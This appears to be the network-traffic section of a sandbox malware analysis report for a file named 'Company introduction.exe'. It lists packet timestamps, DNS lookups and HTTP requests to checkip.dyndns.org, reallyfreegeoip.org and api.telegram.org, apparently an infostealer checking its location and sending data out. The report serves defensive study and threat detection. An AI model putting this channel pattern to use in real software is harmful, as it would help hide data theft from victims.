                                                                                                                                                  Jan 15, 2025 08:39:10.379688978 CET44349751104.21.48.1192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:10.512970924 CET44349751104.21.48.1192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:10.513184071 CET44349751104.21.48.1192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:10.513240099 CET49751443192.168.2.4104.21.48.1
                                                                                                                                                  Jan 15, 2025 08:39:10.513586044 CET49751443192.168.2.4104.21.48.1
                                                                                                                                                  Jan 15, 2025 08:39:10.518037081 CET4974980192.168.2.4193.122.6.168
                                                                                                                                                  Jan 15, 2025 08:39:10.519304991 CET4975380192.168.2.4193.122.6.168
                                                                                                                                                  Jan 15, 2025 08:39:10.523041964 CET8049749193.122.6.168192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:10.523102045 CET4974980192.168.2.4193.122.6.168
                                                                                                                                                  Jan 15, 2025 08:39:10.524249077 CET8049753193.122.6.168192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:10.524331093 CET4975380192.168.2.4193.122.6.168
                                                                                                                                                  Jan 15, 2025 08:39:10.524418116 CET4975380192.168.2.4193.122.6.168
                                                                                                                                                  Jan 15, 2025 08:39:10.529310942 CET8049753193.122.6.168192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:10.633390903 CET44349752104.21.48.1192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:10.635075092 CET49752443192.168.2.4104.21.48.1
                                                                                                                                                  Jan 15, 2025 08:39:10.635157108 CET44349752104.21.48.1192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:10.767107964 CET44349752104.21.48.1192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:10.767307997 CET44349752104.21.48.1192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:10.767484903 CET49752443192.168.2.4104.21.48.1
                                                                                                                                                  Jan 15, 2025 08:39:10.767942905 CET49752443192.168.2.4104.21.48.1
                                                                                                                                                  Jan 15, 2025 08:39:10.772196054 CET4975080192.168.2.4193.122.6.168
                                                                                                                                                  Jan 15, 2025 08:39:10.773442984 CET4975480192.168.2.4193.122.6.168
                                                                                                                                                  Jan 15, 2025 08:39:10.777388096 CET8049750193.122.6.168192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:10.777453899 CET4975080192.168.2.4193.122.6.168
                                                                                                                                                  Jan 15, 2025 08:39:10.778414965 CET8049754193.122.6.168192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:10.778508902 CET4975480192.168.2.4193.122.6.168
                                                                                                                                                  Jan 15, 2025 08:39:10.778608084 CET4975480192.168.2.4193.122.6.168
                                                                                                                                                  Jan 15, 2025 08:39:10.783379078 CET8049754193.122.6.168192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:11.158901930 CET8049753193.122.6.168192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:11.160110950 CET49755443192.168.2.4104.21.48.1
                                                                                                                                                  Jan 15, 2025 08:39:11.160204887 CET44349755104.21.48.1192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:11.160284042 CET49755443192.168.2.4104.21.48.1
                                                                                                                                                  Jan 15, 2025 08:39:11.160732985 CET49755443192.168.2.4104.21.48.1
                                                                                                                                                  Jan 15, 2025 08:39:11.160813093 CET44349755104.21.48.1192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:11.201514959 CET4975380192.168.2.4193.122.6.168
                                                                                                                                                  Jan 15, 2025 08:39:11.401498079 CET8049754193.122.6.168192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:11.451370955 CET4975480192.168.2.4193.122.6.168
                                                                                                                                                  Jan 15, 2025 08:39:11.463088036 CET49756443192.168.2.4104.21.48.1
                                                                                                                                                  Jan 15, 2025 08:39:11.463145018 CET44349756104.21.48.1192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:11.463211060 CET49756443192.168.2.4104.21.48.1
                                                                                                                                                  Jan 15, 2025 08:39:11.463622093 CET49756443192.168.2.4104.21.48.1
                                                                                                                                                  Jan 15, 2025 08:39:11.463643074 CET44349756104.21.48.1192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:11.628978968 CET44349755104.21.48.1192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:11.643754959 CET49755443192.168.2.4104.21.48.1
                                                                                                                                                  Jan 15, 2025 08:39:11.643840075 CET44349755104.21.48.1192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:11.777653933 CET44349755104.21.48.1192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:11.777807951 CET44349755104.21.48.1192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:11.778132915 CET49755443192.168.2.4104.21.48.1
                                                                                                                                                  Jan 15, 2025 08:39:11.778383017 CET49755443192.168.2.4104.21.48.1
                                                                                                                                                  Jan 15, 2025 08:39:11.782500982 CET4975380192.168.2.4193.122.6.168
                                                                                                                                                  Jan 15, 2025 08:39:11.782990932 CET4975780192.168.2.4193.122.6.168
                                                                                                                                                  Jan 15, 2025 08:39:11.787632942 CET8049753193.122.6.168192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:11.787810087 CET4975380192.168.2.4193.122.6.168
                                                                                                                                                  Jan 15, 2025 08:39:11.788017035 CET8049757193.122.6.168192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:11.788137913 CET4975780192.168.2.4193.122.6.168
                                                                                                                                                  Jan 15, 2025 08:39:11.788259983 CET4975780192.168.2.4193.122.6.168
                                                                                                                                                  Jan 15, 2025 08:39:11.793123960 CET8049757193.122.6.168192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:11.918021917 CET44349756104.21.48.1192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:11.923063040 CET49756443192.168.2.4104.21.48.1
                                                                                                                                                  Jan 15, 2025 08:39:11.923086882 CET44349756104.21.48.1192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:12.063730001 CET44349756104.21.48.1192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:12.063786983 CET44349756104.21.48.1192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:12.063853979 CET49756443192.168.2.4104.21.48.1
                                                                                                                                                  Jan 15, 2025 08:39:12.064451933 CET49756443192.168.2.4104.21.48.1
                                                                                                                                                  Jan 15, 2025 08:39:12.068687916 CET4975480192.168.2.4193.122.6.168
                                                                                                                                                  Jan 15, 2025 08:39:12.069870949 CET4975880192.168.2.4193.122.6.168
                                                                                                                                                  Jan 15, 2025 08:39:12.073748112 CET8049754193.122.6.168192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:12.073807955 CET4975480192.168.2.4193.122.6.168
                                                                                                                                                  Jan 15, 2025 08:39:12.074863911 CET8049758193.122.6.168192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:12.074955940 CET4975880192.168.2.4193.122.6.168
                                                                                                                                                  Jan 15, 2025 08:39:12.075045109 CET4975880192.168.2.4193.122.6.168
                                                                                                                                                  Jan 15, 2025 08:39:12.079965115 CET8049758193.122.6.168192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:12.423669100 CET8049757193.122.6.168192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:12.425014019 CET49759443192.168.2.4104.21.48.1
                                                                                                                                                  Jan 15, 2025 08:39:12.425117016 CET44349759104.21.48.1192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:12.425204992 CET49759443192.168.2.4104.21.48.1
                                                                                                                                                  Jan 15, 2025 08:39:12.425482988 CET49759443192.168.2.4104.21.48.1
                                                                                                                                                  Jan 15, 2025 08:39:12.425518990 CET44349759104.21.48.1192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:12.466979980 CET4975780192.168.2.4193.122.6.168
                                                                                                                                                  Jan 15, 2025 08:39:12.706100941 CET8049758193.122.6.168192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:12.707582951 CET49760443192.168.2.4104.21.48.1
                                                                                                                                                  Jan 15, 2025 08:39:12.707684994 CET44349760104.21.48.1192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:12.707766056 CET49760443192.168.2.4104.21.48.1
                                                                                                                                                  Jan 15, 2025 08:39:12.708045959 CET49760443192.168.2.4104.21.48.1
                                                                                                                                                  Jan 15, 2025 08:39:12.708070040 CET44349760104.21.48.1192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:12.748223066 CET4975880192.168.2.4193.122.6.168
                                                                                                                                                  Jan 15, 2025 08:39:12.894571066 CET44349759104.21.48.1192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:12.896445990 CET49759443192.168.2.4104.21.48.1
                                                                                                                                                  Jan 15, 2025 08:39:12.896528959 CET44349759104.21.48.1192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:13.009107113 CET44349759104.21.48.1192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:13.009274960 CET44349759104.21.48.1192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:13.009454012 CET49759443192.168.2.4104.21.48.1
                                                                                                                                                  Jan 15, 2025 08:39:13.009799004 CET49759443192.168.2.4104.21.48.1
                                                                                                                                                  Jan 15, 2025 08:39:13.014468908 CET4975780192.168.2.4193.122.6.168
                                                                                                                                                  Jan 15, 2025 08:39:13.016242027 CET4976180192.168.2.4193.122.6.168
                                                                                                                                                  Jan 15, 2025 08:39:13.019567013 CET8049757193.122.6.168192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:13.019634008 CET4975780192.168.2.4193.122.6.168
                                                                                                                                                  Jan 15, 2025 08:39:13.021217108 CET8049761193.122.6.168192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:13.021287918 CET4976180192.168.2.4193.122.6.168
                                                                                                                                                  Jan 15, 2025 08:39:13.021369934 CET4976180192.168.2.4193.122.6.168
                                                                                                                                                  Jan 15, 2025 08:39:13.026191950 CET8049761193.122.6.168192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:13.189579964 CET44349760104.21.48.1192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:13.190988064 CET49760443192.168.2.4104.21.48.1
                                                                                                                                                  Jan 15, 2025 08:39:13.191046953 CET44349760104.21.48.1192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:13.328200102 CET44349760104.21.48.1192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:13.328284979 CET44349760104.21.48.1192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:13.328589916 CET49760443192.168.2.4104.21.48.1
                                                                                                                                                  Jan 15, 2025 08:39:13.328695059 CET49760443192.168.2.4104.21.48.1
                                                                                                                                                  Jan 15, 2025 08:39:13.332065105 CET4975880192.168.2.4193.122.6.168
                                                                                                                                                  Jan 15, 2025 08:39:13.333050966 CET4976280192.168.2.4193.122.6.168
                                                                                                                                                  Jan 15, 2025 08:39:13.337116003 CET8049758193.122.6.168192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:13.337186098 CET4975880192.168.2.4193.122.6.168
                                                                                                                                                  Jan 15, 2025 08:39:13.338001966 CET8049762193.122.6.168192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:13.338073969 CET4976280192.168.2.4193.122.6.168
                                                                                                                                                  Jan 15, 2025 08:39:13.338157892 CET4976280192.168.2.4193.122.6.168
                                                                                                                                                  Jan 15, 2025 08:39:13.343153000 CET8049762193.122.6.168192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:13.647267103 CET8049761193.122.6.168192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:13.671461105 CET49763443192.168.2.4104.21.48.1
                                                                                                                                                  Jan 15, 2025 08:39:13.671551943 CET44349763104.21.48.1192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:13.671695948 CET49763443192.168.2.4104.21.48.1
                                                                                                                                                  Jan 15, 2025 08:39:13.672178984 CET49763443192.168.2.4104.21.48.1
                                                                                                                                                  Jan 15, 2025 08:39:13.672215939 CET44349763104.21.48.1192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:13.701370001 CET4976180192.168.2.4193.122.6.168
                                                                                                                                                  Jan 15, 2025 08:39:13.967593908 CET8049762193.122.6.168192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:13.969288111 CET49764443192.168.2.4104.21.48.1
                                                                                                                                                  Jan 15, 2025 08:39:13.969383955 CET44349764104.21.48.1192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:13.969490051 CET49764443192.168.2.4104.21.48.1
                                                                                                                                                  Jan 15, 2025 08:39:13.969944954 CET49764443192.168.2.4104.21.48.1
                                                                                                                                                  Jan 15, 2025 08:39:13.969981909 CET44349764104.21.48.1192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:14.013938904 CET4976280192.168.2.4193.122.6.168
                                                                                                                                                  Jan 15, 2025 08:39:14.149068117 CET44349763104.21.48.1192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:14.150962114 CET49763443192.168.2.4104.21.48.1
                                                                                                                                                  Jan 15, 2025 08:39:14.151047945 CET44349763104.21.48.1192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:14.296041012 CET44349763104.21.48.1192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:14.296125889 CET44349763104.21.48.1192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:14.296205997 CET49763443192.168.2.4104.21.48.1
                                                                                                                                                  Jan 15, 2025 08:39:14.312596083 CET49763443192.168.2.4104.21.48.1
                                                                                                                                                  Jan 15, 2025 08:39:14.360457897 CET4976580192.168.2.4193.122.6.168
                                                                                                                                                  Jan 15, 2025 08:39:14.361495018 CET4976180192.168.2.4193.122.6.168
                                                                                                                                                  Jan 15, 2025 08:39:14.366288900 CET8049765193.122.6.168192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:14.366380930 CET4976580192.168.2.4193.122.6.168
                                                                                                                                                  Jan 15, 2025 08:39:14.367685080 CET8049761193.122.6.168192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:14.367758989 CET4976180192.168.2.4193.122.6.168
                                                                                                                                                  Jan 15, 2025 08:39:14.424242020 CET44349764104.21.48.1192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:14.434523106 CET49764443192.168.2.4104.21.48.1
                                                                                                                                                  Jan 15, 2025 08:39:14.434580088 CET44349764104.21.48.1192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:14.442634106 CET4976580192.168.2.4193.122.6.168
                                                                                                                                                  Jan 15, 2025 08:39:14.447487116 CET8049765193.122.6.168192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:14.542064905 CET44349764104.21.48.1192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:14.542144060 CET44349764104.21.48.1192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:14.542193890 CET49764443192.168.2.4104.21.48.1
                                                                                                                                                  Jan 15, 2025 08:39:14.542912960 CET49764443192.168.2.4104.21.48.1
                                                                                                                                                  Jan 15, 2025 08:39:14.736341000 CET4976280192.168.2.4193.122.6.168
                                                                                                                                                  Jan 15, 2025 08:39:14.741529942 CET8049762193.122.6.168192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:14.741599083 CET4976280192.168.2.4193.122.6.168
                                                                                                                                                  Jan 15, 2025 08:39:14.743679047 CET49766443192.168.2.4149.154.167.220
                                                                                                                                                  Jan 15, 2025 08:39:14.743726015 CET44349766149.154.167.220192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:14.743782997 CET49766443192.168.2.4149.154.167.220
                                                                                                                                                  Jan 15, 2025 08:39:14.744441986 CET49766443192.168.2.4149.154.167.220
                                                                                                                                                  Jan 15, 2025 08:39:14.744467020 CET44349766149.154.167.220192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:14.999947071 CET8049765193.122.6.168192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:15.001471043 CET49767443192.168.2.4104.21.48.1
                                                                                                                                                  Jan 15, 2025 08:39:15.001516104 CET44349767104.21.48.1192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:15.001575947 CET49767443192.168.2.4104.21.48.1
                                                                                                                                                  Jan 15, 2025 08:39:15.001904964 CET49767443192.168.2.4104.21.48.1
                                                                                                                                                  Jan 15, 2025 08:39:15.001921892 CET44349767104.21.48.1192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:15.045125961 CET4976580192.168.2.4193.122.6.168
                                                                                                                                                  Jan 15, 2025 08:39:15.383326054 CET44349766149.154.167.220192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:15.383440971 CET49766443192.168.2.4149.154.167.220
                                                                                                                                                  Jan 15, 2025 08:39:15.386177063 CET49766443192.168.2.4149.154.167.220
                                                                                                                                                  Jan 15, 2025 08:39:15.386203051 CET44349766149.154.167.220192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:15.386636019 CET44349766149.154.167.220192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:15.388571978 CET49766443192.168.2.4149.154.167.220
                                                                                                                                                  Jan 15, 2025 08:39:15.435349941 CET44349766149.154.167.220192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:15.459842920 CET44349767104.21.48.1192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:15.462754011 CET49767443192.168.2.4104.21.48.1
                                                                                                                                                  Jan 15, 2025 08:39:15.462774992 CET44349767104.21.48.1192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:15.605343103 CET44349767104.21.48.1192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:15.605403900 CET44349767104.21.48.1192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:15.605588913 CET49767443192.168.2.4104.21.48.1
                                                                                                                                                  Jan 15, 2025 08:39:15.606338024 CET49767443192.168.2.4104.21.48.1
                                                                                                                                                  Jan 15, 2025 08:39:15.611936092 CET4976980192.168.2.4193.122.6.168
                                                                                                                                                  Jan 15, 2025 08:39:15.612059116 CET4976580192.168.2.4193.122.6.168
                                                                                                                                                  Jan 15, 2025 08:39:15.616844893 CET8049769193.122.6.168192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:15.617036104 CET4976980192.168.2.4193.122.6.168
                                                                                                                                                  Jan 15, 2025 08:39:15.617134094 CET4976980192.168.2.4193.122.6.168
                                                                                                                                                  Jan 15, 2025 08:39:15.617321968 CET8049765193.122.6.168192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:15.620997906 CET4976580192.168.2.4193.122.6.168
                                                                                                                                                  Jan 15, 2025 08:39:15.621965885 CET8049769193.122.6.168192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:15.625099897 CET44349766149.154.167.220192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:15.625180006 CET44349766149.154.167.220192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:15.625262976 CET49766443192.168.2.4149.154.167.220
                                                                                                                                                  Jan 15, 2025 08:39:15.632951021 CET49766443192.168.2.4149.154.167.220
                                                                                                                                                  Jan 15, 2025 08:39:16.274338007 CET8049769193.122.6.168192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:16.276129961 CET49770443192.168.2.4104.21.48.1
                                                                                                                                                  Jan 15, 2025 08:39:16.276228905 CET44349770104.21.48.1192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:16.276320934 CET49770443192.168.2.4104.21.48.1
                                                                                                                                                  Jan 15, 2025 08:39:16.276633978 CET49770443192.168.2.4104.21.48.1
                                                                                                                                                  Jan 15, 2025 08:39:16.276671886 CET44349770104.21.48.1192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:16.326411963 CET4976980192.168.2.4193.122.6.168
                                                                                                                                                  Jan 15, 2025 08:39:16.753818035 CET44349770104.21.48.1192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:16.755830050 CET49770443192.168.2.4104.21.48.1
                                                                                                                                                  Jan 15, 2025 08:39:16.755858898 CET44349770104.21.48.1192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:16.890670061 CET44349770104.21.48.1192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:16.890865088 CET44349770104.21.48.1192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:16.890986919 CET49770443192.168.2.4104.21.48.1
                                                                                                                                                  Jan 15, 2025 08:39:16.891935110 CET49770443192.168.2.4104.21.48.1
                                                                                                                                                  Jan 15, 2025 08:39:16.920808077 CET4976980192.168.2.4193.122.6.168
                                                                                                                                                  Jan 15, 2025 08:39:16.926021099 CET8049769193.122.6.168192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:16.926264048 CET4976980192.168.2.4193.122.6.168
                                                                                                                                                  Jan 15, 2025 08:39:16.927175045 CET49773443192.168.2.4149.154.167.220
                                                                                                                                                  Jan 15, 2025 08:39:16.927268982 CET44349773149.154.167.220192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:16.928174019 CET49773443192.168.2.4149.154.167.220
                                                                                                                                                  Jan 15, 2025 08:39:16.928612947 CET49773443192.168.2.4149.154.167.220
                                                                                                                                                  Jan 15, 2025 08:39:16.928669930 CET44349773149.154.167.220192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:17.564191103 CET44349773149.154.167.220192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:17.564307928 CET49773443192.168.2.4149.154.167.220
                                                                                                                                                  Jan 15, 2025 08:39:17.589514971 CET49773443192.168.2.4149.154.167.220
                                                                                                                                                  Jan 15, 2025 08:39:17.589560032 CET44349773149.154.167.220192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:17.589965105 CET44349773149.154.167.220192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:17.610655069 CET49773443192.168.2.4149.154.167.220
                                                                                                                                                  Jan 15, 2025 08:39:17.655340910 CET44349773149.154.167.220192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:17.808172941 CET44349773149.154.167.220192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:17.808254004 CET44349773149.154.167.220192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:17.808362961 CET49773443192.168.2.4149.154.167.220
                                                                                                                                                  Jan 15, 2025 08:39:17.836663008 CET49773443192.168.2.4149.154.167.220
                                                                                                                                                  Jan 15, 2025 08:39:32.054512978 CET4973880192.168.2.4193.122.6.168
                                                                                                                                                  Jan 15, 2025 08:39:34.231540918 CET4974580192.168.2.4193.122.6.168

                                                                                                                                                  UDP Packets

                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                  Jan 15, 2025 08:39:03.333297968 CET5854053192.168.2.41.1.1.1
                                                                                                                                                  Jan 15, 2025 08:39:03.340167999 CET53585401.1.1.1192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:04.226078033 CET4954253192.168.2.41.1.1.1
                                                                                                                                                  Jan 15, 2025 08:39:04.233692884 CET53495421.1.1.1192.168.2.4
                                                                                                                                                  Jan 15, 2025 08:39:14.735824108 CET6015053192.168.2.41.1.1.1
                                                                                                                                                  Jan 15, 2025 08:39:14.742846966 CET53601501.1.1.1192.168.2.4

                                                                                                                                                  DNS Queries

                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                  Jan 15, 2025 08:39:03.333297968 CET192.168.2.41.1.1.10x5372Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                                                  Jan 15, 2025 08:39:04.226078033 CET192.168.2.41.1.1.10xf293Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                                                                  Jan 15, 2025 08:39:14.735824108 CET192.168.2.41.1.1.10x5849Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                                                                                                                  DNS Answers

                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                  Jan 15, 2025 08:39:03.340167999 CET1.1.1.1192.168.2.40x5372No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Jan 15, 2025 08:39:03.340167999 CET1.1.1.1192.168.2.40x5372No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                                                  Jan 15, 2025 08:39:03.340167999 CET1.1.1.1192.168.2.40x5372No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                                                  Jan 15, 2025 08:39:03.340167999 CET1.1.1.1192.168.2.40x5372No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                                                  Jan 15, 2025 08:39:03.340167999 CET1.1.1.1192.168.2.40x5372No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                                                  Jan 15, 2025 08:39:03.340167999 CET1.1.1.1192.168.2.40x5372No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                                                  Jan 15, 2025 08:39:04.233692884 CET1.1.1.1192.168.2.40xf293No error (0)reallyfreegeoip.org104.21.48.1A (IP address)IN (0x0001)false
                                                                                                                                                  Jan 15, 2025 08:39:04.233692884 CET1.1.1.1192.168.2.40xf293No error (0)reallyfreegeoip.org104.21.16.1A (IP address)IN (0x0001)false
                                                                                                                                                  Jan 15, 2025 08:39:04.233692884 CET1.1.1.1192.168.2.40xf293No error (0)reallyfreegeoip.org104.21.32.1A (IP address)IN (0x0001)false
                                                                                                                                                  Jan 15, 2025 08:39:04.233692884 CET1.1.1.1192.168.2.40xf293No error (0)reallyfreegeoip.org104.21.96.1A (IP address)IN (0x0001)false
                                                                                                                                                  Jan 15, 2025 08:39:04.233692884 CET1.1.1.1192.168.2.40xf293No error (0)reallyfreegeoip.org104.21.64.1A (IP address)IN (0x0001)false
                                                                                                                                                  Jan 15, 2025 08:39:04.233692884 CET1.1.1.1192.168.2.40xf293No error (0)reallyfreegeoip.org104.21.112.1A (IP address)IN (0x0001)false
                                                                                                                                                  Jan 15, 2025 08:39:04.233692884 CET1.1.1.1192.168.2.40xf293No error (0)reallyfreegeoip.org104.21.80.1A (IP address)IN (0x0001)false
                                                                                                                                                  Jan 15, 2025 08:39:14.742846966 CET1.1.1.1192.168.2.40x5849No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                                                                                                                  HTTP Request Dependency Graph

                                                                                                                                                  • reallyfreegeoip.org
                                                                                                                                                  • api.telegram.org
                                                                                                                                                  • checkip.dyndns.org

                                                                                                                                                  HTTP Packets

                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  0192.168.2.449733193.122.6.168807812C:\Users\user\Desktop\Company introduction.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Jan 15, 2025 08:39:03.352514029 CET151OUTGET / HTTP/1.1
                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Jan 15, 2025 08:39:03.979095936 CET273INHTTP/1.1 200 OK
                                                                                                                                                  Date: Wed, 15 Jan 2025 07:39:03 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Content-Length: 104
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                                  Jan 15, 2025 08:39:03.991544962 CET127OUTGET / HTTP/1.1
                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                                  Jan 15, 2025 08:39:04.177424908 CET273INHTTP/1.1 200 OK
                                                                                                                                                  Date: Wed, 15 Jan 2025 07:39:04 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Content-Length: 104
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                                  Jan 15, 2025 08:39:04.957642078 CET127OUTGET / HTTP/1.1
                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
